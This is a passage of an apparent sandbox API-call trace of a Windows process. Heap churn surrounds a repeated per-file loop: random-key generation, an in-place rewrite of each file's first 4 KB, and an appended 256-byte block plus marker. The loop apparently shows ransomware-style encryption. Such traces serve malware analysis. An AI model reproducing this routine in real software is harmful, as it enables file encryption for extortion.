hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.820] GetProcessHeap () returned 0x4f10000 [0084.820] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.821] GetProcessHeap () returned 0x4f10000 [0084.821] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.822] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.822] GetProcessHeap () returned 0x4f10000 [0084.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.823] GetProcessHeap () returned 0x4f10000 [0084.823] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.824] SetFilePointerEx (in: hFile=0x99c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.824] WriteFile (in: hFile=0x99c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.824] WriteFile (in: hFile=0x99c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.824] GetProcessHeap () returned 0x4f10000 [0084.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.824] GetProcessHeap () returned 0x4f10000 [0084.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.824] GetProcessHeap () returned 0x4f10000 [0084.824] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.824] CloseHandle (hObject=0x99c) returned 1 [0084.826] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 137 [0084.826] SetFilePointerEx (in: hFile=0x9a0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.826] ReadFile (in: hFile=0x9a0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0084.826] SetFilePointerEx (in: hFile=0x9a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.826] GetProcessHeap () returned 0x4f10000 [0084.826] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0084.826] GetProcessHeap () returned 0x4f10000 [0084.827] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0084.827] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0084.827] GetProcessHeap () returned 0x4f10000 [0084.827] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0084.827] ReadFile (in: hFile=0x9a0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0084.877] SetFilePointerEx (in: hFile=0x9a0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.877] WriteFile (in: hFile=0x9a0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.878] GetProcessHeap () returned 0x4f10000 [0084.878] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.879] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.879] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.880] GetProcessHeap () returned 0x4f10000 [0084.880] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.881] GetProcessHeap () returned 0x4f10000 [0084.881] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0084.882] SetFilePointerEx (in: hFile=0x9a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.882] WriteFile (in: hFile=0x9a0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0084.882] WriteFile (in: hFile=0x9a0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.882] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0084.882] GetProcessHeap () returned 0x4f10000 [0084.883] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0084.883] CloseHandle (hObject=0x9a0) returned 1 [0084.884] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 138 [0084.884] SetFilePointerEx (in: hFile=0x9a4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 